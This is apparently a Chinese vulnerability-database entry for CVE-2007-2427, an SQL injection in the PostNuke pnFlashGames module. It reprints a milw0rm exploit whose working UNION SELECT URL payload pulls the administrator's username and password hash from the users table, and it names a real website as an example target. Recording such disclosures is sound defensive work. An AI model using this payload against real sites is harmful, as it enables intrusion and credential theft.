PNFlashGames PostNuke Module 'Index.PHP 'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112816 漏洞类型 SQL注入
发布时间 2007-04-28 更新时间 2007-05-04
CVE编号 CVE-2007-2427 CNNVD-ID CNNVD-200705-010
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3813
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-010
|漏洞详情
PostNukepnFlashGames的index.php中存在SQL注入漏洞。远程攻击者可以借助cid参数,执行任意的SQL指令。
|漏洞EXP
============================================================

PostNuke pnFlashGames Module v1.5 REmote SQL Injection 

============================================================

Bulan: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit: 
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]
|参考资料

来源:BID
名称:23701
链接:http://www.securityfocus.com/bid/23701
来源:MILW0RM
名称:3813
链接:http://www.milw0rm.com/exploits/3813
来源:OSVDB
名称:35474
链接:http://osvdb.org/35474
来源:XF
名称:pnflashgames-index-sql-injection(33960)
链接:http://xforce.iss.net/xforce/xfdb/33960
来源:VUPEN
名称:ADV-2007-1581
链接:http://www.frsirt.com/english/advisories/2007/1581
来源:SECUNIA
名称:25043
链接:http://secunia.com/advisories/25043